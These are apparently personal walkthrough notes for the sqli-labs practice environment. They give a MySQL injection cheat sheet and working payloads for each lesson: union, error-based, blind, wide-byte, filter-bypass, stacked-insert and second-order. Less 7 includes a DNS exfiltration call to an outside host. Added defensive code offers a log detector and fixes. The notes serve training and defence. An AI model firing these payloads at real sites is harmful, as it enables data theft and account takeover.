sqli-labs walkthrough notes

1. General queries

1.1. Functions

  1. concat(arg1,arg2,arg3); each arg can be a string, a subquery, or a column name; the arguments are concatenated
  2. group_concat(arg); concatenates every value in the column into one returned string
  3. concat_ws(str1,arg1,arg2,arg3); joins the remaining arguments using str1 as the separator
  4. substr(str,argint1,argint2); substring extraction: argint1 is the start index (1-based), argint2 is the length
  5. mid, a drop-in replacement for substr

    select mid((select database()),1,1);

    select mid((select database()) from 1 for 1);

  6. ascii(arg); returns the ASCII code of a character as a number, commonly used for binary search. ord can be used instead
  7. extractvalue(1,concat(0x7e,(arg),0x7e)); arg is the query whose result is leaked; the error message shows at most 32 characters
  8. updatexml(1,concat(0x7e,(arg),0x7e),1); same principle as above
  9. exp(arg); error-based function using exp
  10. sleep(argint); time-based function, argint is the delay in seconds
  11. group by x; group-by error, only works on a few (older) versions
  12. order by argint; arg is a number, used to determine how many columns the query returns
  13. regexp can replace the equals sign
  14. between argint and argint can be used for ascii comparisons, or, when both arguments are the same, as a replacement for the equals sign
  15. limit argint1,argint2; argint1 is the offset (0-based), argint2 is the row count
  • Tricks for getting around comma filtering
  1. In stacked injection, use cross join to avoid the comma,

    • eg:

      INSERT INTO users SELECT * FROM (SELECT 3)a CROSS JOIN (SELECT 'systest')b CROSS JOIN (SELECT '15661561521')c
  2. In union injection, use join to avoid the comma

  3. Use offset to avoid the comma after limit: limit 1 offset 0 is equivalent to limit 0,1;

  4. Use from x for 1 to avoid the comma inside substr()

  5. Concrete example: https://github.com/takakie/CVE/blob/main/home-rental/home-rental-sqlinject1.md

1.2. Special characters

  1. 0x7e equals ~
  2. 0x81~0xFF: %df is used for wide-byte injection; it swallows the special character (the escaping backslash) that follows it, exploiting the two-byte encoding of Chinese characters
  3. /* */, --+, /*! */, ;, # are the comment forms

1.3. Special databases, tables and columns

  1. information_schema stores the metadata for every database and table on the server
  2. schemata is used to list which databases exist
  3. tables is used to list which tables a given database has
  4. columns is used to list which columns a given table has
  5. database name: schema_name, table name: table_name, column name: column_name

1.4. Special query statements

  1. Current database: select database()

  2. Current database version: select version()

  3. Current user: select user()

  4. List the databases on the server

    select group_concat(schema_name) from information_schema.schemata
  5. List the tables in a given database (note: the column here is table_schema, not schema_name)

    select group_concat(table_name) from information_schema.tables where table_schema = 'args'
  6. List the columns in a given table

    select group_concat(column_name) from information_schema.columns where table_name = 'args'
  7. Error-based queries

    and updatexml(1,concat(0x7e,(select database()),0x7e),1);
    and extractvalue(1,concat(0x7e,(select database()),0x7e));
    # find the tables (and their databases) that have a column named flag
    and updatexml(1,(concat(0x7e,(select concat_ws('@',1,table_schema,table_name) from information_schema.columns where column_name='flag' limit 1,1),0x7e)),1)
    exp(~(select * from (select user())as a))
  8. Time-based blind injection

    and if(substr((select database()),1,1)='r',sleep(1),1)
    and if(ascii(substr((select database()),1,1))>100,sleep(1),1)
  9. Query the data in a given table

    select 1,(select group_concat(concat(username,':',password)) from users),database()
    select 1,(select concat_ws('~',id,username,password) from users limit 1,1),3
  10. Checking that flag is not empty

    select flag from metinfo.met_lang where COALESCE(flag, '') != '';
    select flag from metinfo.met_lang where flag != '' and flag is not null;
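The function and query shapes collected above (updatexml/extractvalue/exp errors, sleep delays, union select, information_schema enumeration, stacked inserts, and the %df and %a0 characters) are also what a defender looks for in web-server access logs. The script below is an added example and is not part of the original notes: it URL-decodes the query string of constructed log lines without assuming UTF-8 (so %df and %a0 survive as single characters) and tags each request with the technique families it matches. The log lines, the paths and the signature set are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Signature families for the techniques listed in the notes. They are matched against
# the URL-decoded query string, with the %a0 non-breaking space folded to a plain space.
SIGNATURES = {
    "error-based": re.compile(r"\b(?:updatexml|extractvalue|exp)\s*\(", re.I),
    "time-based":  re.compile(r"\bsleep\s*\(", re.I),
    "union-based": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b", re.I),
    "stacked":     re.compile(r";\s*(?:insert|update|delete|drop)\b", re.I),
    # a byte in 0x81-0xFE directly before a quote is the wide-byte (%df%27) shape
    "wide-byte":   re.compile(r"[\x81-\xfe]'"),
}


def decode_query(raw: str) -> str:
    """URL-decode without assuming UTF-8, so %df and %a0 survive as single
    characters instead of being replaced by U+FFFD."""
    text = unquote_to_bytes(raw.replace("+", " ")).decode("latin-1")
    return text.replace("\xa0", " ")


def classify(query: str):
    """Return the signature families the decoded query string matches."""
    decoded = decode_query(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines):
    """Return (path, families) for every request whose query string matched."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group(1):
            continue
        path, _, query = m.group(1).partition("?")
        families = classify(query)
        if families:
            hits.append((path, families))
    return hits


# Constructed access-log lines (combined format); the payloads mirror the notes above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=-1%27+union+select+1,2,3--+ HTTP/1.1" 200 530',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-5/?id=1%27+and+updatexml(1,concat(0x7e,database(),0x7e),1)--+ HTTP/1.1" 200 611',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-9/?id=1%27+and+if(1=1,sleep(2),2)--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-26/?id=0%27union%a0select%a01,database(),%273 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-32/?id=0%df%27+union+select+1,database(),3--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /search?q=union+station+select+hotels HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for path, families in scan_log(SAMPLE_LOG):
        print(path, ",".join(families))
```

Decoding through latin-1 rather than UTF-8 is the point that is easy to miss: a decoder that replaces the lone 0xDF byte with U+FFFD destroys exactly the evidence the wide-byte rule needs, and the same goes for %a0 as a whitespace substitute.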

2. Course notes

1. Less 1

  1. Direct single-quote string injection, payload: '
  • ?id=-1' union select 1, 2, 3 --+

2. Less 2

  • ?id=-1 union select 1, 2, 3 --+

3. Less 3

  • ?id=-1') union select 1,2,3 --+

4. Less 4

  • ?id=-1") union select 1,2,3 --+

5. Less 5

  • ?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+

6. Less 6

  • ?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1) --+

7. Less 7

  • ?id=1'))+and+load_file(concat('//',(database()),'.btcee6.dnslog.cn/123'))--+

8. Less 8

  • ?id=1'+and+1=if(substr(database(),1,1)='s',1,2)--+

9. Less 9

  • ?id=1'+and+if(1=1,sleep(2),2)--+

10. Less 10

  • ?id=1%22+and+if(substr(user(),1,1)='r',sleep(1),1)--+

11. Less 11

  • uname=admin'+union+select+(select+flag+from+metinfo.met_lang+where+flag+is+not+null+and+flag+!=+''limit+0,1),(database())--+&passwd=1234562

12. Less 12

  • uname=-admin")+union+select+1,database()--+&passwd=admin&submit=Submit

13. Less 13

  • uname=admin')+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+

14. Less 14

  • uname=admin"+and+extractvalue(1,concat(0x7e,user(),0x7e))--+

15. Less 15

  • uname=admin'+and+1=if(substr(database(),1,1)='s',1,2)--+

16. Less 16

  • uname=admin")+and+1=if(substr(database(),1,1)='s',1,2)--+

17. Less 17

  • passwd=123456'+where+updatexml(1,concat(0x7e,database(),0x7e),1);--+

18. Less 18 (insert)

  • ' OR updatexml(1,concat(0x7e,database()),0x7e) OR '

    # the SQL statement the backend executes
    insert into uagents (uagent,ip_address,username) values ('' OR updatexml(1,concat(0x7e,database()),0x7e) OR '','192.168.31.246','admin')

19. Less 19 (insert)

  • Referer: 'or updatexml(1,concat(0x7e,database(),0x7e),1) or'

  • Note: if the error FUNCTION security.updataxml does not exist appears, the function does not exist; check whether the function name was misspelled

20. Less 20

  • Cookie: uname=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) -- sd
  • Cookie: uname=J29yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCksMHg3ZSksMSkgb3In

22. Less 22

  • Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpLDEpLS0gcw==
  • Cookie: uname=admin" and updatexml(1,concat(0x7e,database(),0x7e),1)-- s

23. Less 23 (comments removed)

  • ?id=-2'+union+select+1,database(),'

24. Less 24 (second-order injection)

  • When creating a new user, set username=admin'+--+1
  • Then log in as username=admin'+--+1,
  • Finally enter any password; admin's password is changed.
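Less 24 works because a value that was stored safely through a parameterized INSERT is later read back from the database and spliced into the text of the UPDATE. The sqlite3 script below is an added example, not the lab's own PHP source: it reproduces that flow and places the hardened version beside it. The table, the accounts and the passwords are constructed. SQLite treats -- as a line comment just as MySQL does, which is what lets the stored username truncate the WHERE clause and drop the old-password check.

```python
import sqlite3


def new_db():
    """Constructed users table holding only the legitimate admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'admin-secret')")
    return conn


def register(conn, username, password):
    # Registration is parameterized: the quote and the comment are stored literally,
    # which is exactly why the input looks harmless at this stage.
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def change_password_vulnerable(conn, username, old_password, new_password):
    # The stored username is read back from the database and spliced into the
    # UPDATE text: the second-order flaw of Less 24.
    stored = conn.execute("SELECT username FROM users WHERE username = ?",
                          (username,)).fetchone()[0]
    sql = (f"UPDATE users SET password='{new_password}' "
           f"WHERE username='{stored}' AND password='{old_password}'")
    conn.execute(sql)


def change_password_safe(conn, username, old_password, new_password):
    # Same flow, but every value stays a bound parameter, so the stored quote
    # and comment are just characters inside a string.
    stored = conn.execute("SELECT username FROM users WHERE username = ?",
                          (username,)).fetchone()[0]
    conn.execute("UPDATE users SET password=? WHERE username=? AND password=?",
                 (new_password, stored, old_password))


def admin_password_after(change_password):
    """Run the three Less 24 steps against one implementation and return the
    admin password afterwards."""
    conn = new_db()
    register(conn, "admin' -- 1", "attacker-pw")                     # step 1: crafted user
    change_password(conn, "admin' -- 1", "not-the-old-pw", "pwned")  # steps 2-3: log in, change
    return conn.execute("SELECT password FROM users WHERE username='admin'").fetchone()[0]


if __name__ == "__main__":
    print("vulnerable:", admin_password_after(change_password_vulnerable))
    print("safe:      ", admin_password_after(change_password_safe))
```

In the vulnerable path the executed statement becomes UPDATE users SET password='pwned' WHERE username='admin' followed by a comment, so the old-password check never runs; in the safe path the UPDATE looks for the literal username admin' -- 1 with a wrong old password and touches nothing.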

25. Less 25 (and/or filtered)

  • ?id=-2'+union+select+1,database(),3--+
  • The || operator can replace or
  • anandd, i.e. writing the keyword twice, gets past the filter

26. Less 25a

  • ?id=-2+union+select+1,database(),3--+

27. Less 26

  • %a0 (non-breaking space) gets past the whitespace check

  • ?id=0'union%a0select%a01,database(),'3

28. Less 26a

  • ?id=0')%a0union%a0select%a01,2,('3

29. Less 27

  • ?id=3'%a0and%a0extractvalue(1,concat(0x7e,database(),0x7e))%a0and%a0''='

30. Less 27a

  • ?id=1"%a0and%a0substr(database(),5,1)='r'%a0and%a0""="

31. Less 28

  • ?id=0')%a0UnIOn%a0seLeCt%a01,database(),('3

32. Less 28a

  • ?id=3')%a0and%a0substr(database(),1,1)='s'%a0and%a0''=('

33. Less 29

  • ?id=-1' union select 1,database(),3 --+
  • Didn't quite understand this one

34. Less 30

  • ?id=-2" union select 1,database(),3 --+

35. Less 31

  • ?id=-1")union+select+1,database(),3--+

36. Less 32

  • ?id=0%df'+union+select+1,database(),3--+
  • Uses %df wide-byte injection to swallow the backslash that follows it
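Why %df works on Less 32 and 33, seen from the defender's side: escaping is applied byte by byte (as PHP's addslashes does), but the server interprets the bytes as GBK, where 0xDF followed by the 0x5C backslash forms one two-byte character and the quote after it is left bare. The script below is an added example and not code from the lab; its addslashes port and its decode-then-escape fix are assumptions standing in for the real remedies, which are telling the driver the connection charset (mysqli::set_charset) or, better, binding parameters.

```python
def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping in the style of PHP's addslashes(): a backslash is put
    before every ' " \\ byte with no knowledge of which bytes form one character."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\":
            out.append(0x5C)          # 0x5C is the backslash
        out.append(b)
    return bytes(out)


def server_sees(raw: bytes, charset: str) -> str:
    """The vulnerable order: escape the raw bytes first, then let the database
    interpret the result in the connection charset."""
    return addslashes(raw).decode(charset, errors="replace")


def server_sees_fixed(raw: bytes, charset: str) -> str:
    """The fixed order: interpret the bytes as text first, then escape the
    characters. This stands in for a charset-aware driver escape (assumption)."""
    text = raw.decode(charset, errors="replace")
    return text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def quotes_escaped(sql_fragment: str) -> bool:
    """True when every single quote in the fragment is preceded by a backslash."""
    return all(i > 0 and sql_fragment[i - 1] == "\\"
               for i, ch in enumerate(sql_fragment) if ch == "'")


# Constructed input: the %df%27 pair from the Less 32 payload, as raw request bytes.
PAYLOAD = b"\xdf'"

if __name__ == "__main__":
    for charset in ("utf-8", "gbk"):
        print(charset, "vulnerable:", quotes_escaped(server_sees(PAYLOAD, charset)),
              "fixed:", quotes_escaped(server_sees_fixed(PAYLOAD, charset)))
```

With a UTF-8 connection the stray 0xDF byte is simply invalid and the backslash survives in front of the quote; with GBK the pair 0xDF 0x5C decodes to a single ideograph (運) and the quote is unescaped. Escaping after decoding keeps the backslash attached to the quote regardless of charset, which is the property bound parameters give you for free.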

37. Less 33

  • ?id=-2%df'+union+select+1,database(),3--+

38. Less 34

  • uname=admin%df'+and+extractvalue(1,concat(0x7e,database(),0x7e))--+x

39. Less 35

  • ?id=-2+union+select+1,database(),3--+

40. Less 36

  • ?id=-2%df'+union+select+1,database(),3--+-

41. Less 37

  • uname=admin%df'+and+extractvalue(1,concat(0x7e,database(),0x7e))--+-

42. Less 38

  • ?id=-2'+union+select+1,database(),3--+

43. Less 39

  • ?id=-2'+union+select+1,database(),3--+

  • ?id=2';insert+into+users+(id,username,password)+values+(16,'admin12343','password')--+

44. Less 40

  • ?id=1;insert+into+users(username,password)+values('admin123','123456')--+

45. Less 41

  • ?id=-2;insert+into+users(username,password)+values('admin41','123456')--+

46. Less 42

  • login_password=admin';insert+into+users(username,password)+values('admin42','123')--+

47. Less 43

  • login_password=admin');insert+into+users(username,password)+values('admin43','123456')--+

48. Less 44

  • login_password=admin';insert into users(username,password) values('admin44','123456')--+

49. Less 45

  • login_password=admin');insert+into+users(username,password)+values('admin45','123456')--+

50. Less 46 (Order by) (numeric)

  • Use rand(0) and rand(1) to tell whether the sort order changes

  • ?sort=rand(extractvalue(1,concat(0x7e,database(),0x7e)))

  • SELECT * FROM users ORDER BY $id
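In Less 46 (and Less 47 after it) the sort parameter lands inside ORDER BY, and a bound parameter cannot stand in for a column name there, so the usual parameterization does not close the hole shown by SELECT * FROM users ORDER BY $id. The added example below (not the lab's code) maps the user's sort value onto a fixed allow-list of clauses and rejects everything else; the column names and the sample rows are constructed.

```python
import sqlite3

# The only sort keys a user may choose (constructed for this example).
ALLOWED_SORT_COLUMNS = ("id", "username")


def build_order_by(sort_param: str) -> str:
    """Turn a user-supplied sort value such as 'username' or 'id:desc' into a
    fixed ORDER BY clause. Column and direction are looked up, never copied,
    so no text from the request reaches the SQL string."""
    column, _, direction = sort_param.strip().partition(":")
    if column not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    direction = (direction or "asc").lower()
    if direction not in ("asc", "desc"):
        raise ValueError(f"unsupported sort direction: {direction!r}")
    return f"ORDER BY {column} {direction.upper()}"


def sample_db():
    """Constructed users table with three rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "carol"), (2, "alice"), (3, "bob")])
    return conn


def list_users(sort_param: str):
    """Return usernames sorted as requested, or None when the parameter is rejected."""
    try:
        clause = build_order_by(sort_param)
    except ValueError:
        return None
    conn = sample_db()
    return [row[0] for row in conn.execute("SELECT username FROM users " + clause)]


if __name__ == "__main__":
    for param in ("username", "id:desc", "rand(extractvalue(1,concat(0x7e,database(),0x7e)))"):
        print(repr(param), "->", list_users(param))
```

Rejecting rather than sanitizing is deliberate: the rand(...) and sleep(...) shapes in the notes show that any attempt to clean an arbitrary expression leaves something behind, whereas a lookup table has no expression to clean.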

51. Less 47 (string)

  • ?sort=1'+and+extractvalue(1,concat(0x7e,database(),0x7e))--+
  • SELECT * FROM users ORDER BY '$id'

52. Less 48

  • ?sort=rand(substr(database(),2,1)='e')

53. Less 49

  • ?sort=1'+and+if(substr(database(),1,1)='a',sleep(0.2),2)--+

54. Less 50

  • ?sort=1;insert+into+users(username,password)+values('admin50','123456');

55. Less 51

  • ?sort=1';insert+into+users(username,password)+values('admin51','123456');--+

56. Less 52

  • ?sort=1;insert+into+users(username,password)+values('admin52','123456');

57. Less 53

  • ?sort=1';insert+into+users(username,password)+values('admin53','123456');

58. Less 54 (the challenges begin)

  • ?id=-1'+union+select+1,(select+secret_HN7O+from+CHALLENGES.8u96bgqr6k+limit 0,1),3--+

    # get the column names
    select group_concat(column_name) from information_schema.columns where table_schema='CHALLENGES'
    # get the table names
    select group_concat(table_name) from information_schema.tables where table_schema='CHALLENGES'
    # tables and columns in one query
    select group_concat(concat(table_name,'@',column_name)) from information_schema.columns where table_schema='CHALLENGES'
    # tables and columns in one query, refined
    select concat(table_name,'@',column_name) from information_schema.columns where table_schema='CHALLENGES' and substr(column_name,1,6)='secret'

59. Less 55

  • ?id=-1)+union+select+1,(select secret_MPMF from challenges.6c905h5gnb limit 0,1),3--+

60. Less 56

  • ?id=-1")--+

61. Less 57

  • ?id=-2"+union+select+1,(select secret_SP7C from challenges.16vjhzk4v6),3--+

62. Less 58

  • ?id=1'+and+exp(~(select * from (select concat(table_name,'@',column_name) from information_schema.columns where table_schema='CHALLENGES' and substr(column_name,1,6)='secret')as a));--+

63. Less 59

  • ?id=1+and+exp(~(select * from (select secret_A464 from challenges.ee4euc0k32)as a));--+

64. Less 60

  • ?id=2")+and+exp(~(select * from (select concat(table_name,'@',column_name) from information_schema.columns where table_schema='CHALLENGES' and substr(column_name,1,6)='secret')as a));--+

65. Less 61

  • ?id=2'))+and+exp(~(select * from (select secret_5NFH from challenges.3pw6shmv87)as a));--+

66. Less 62

  • kUJ5DvUgf8TvbETeyoCDFxsS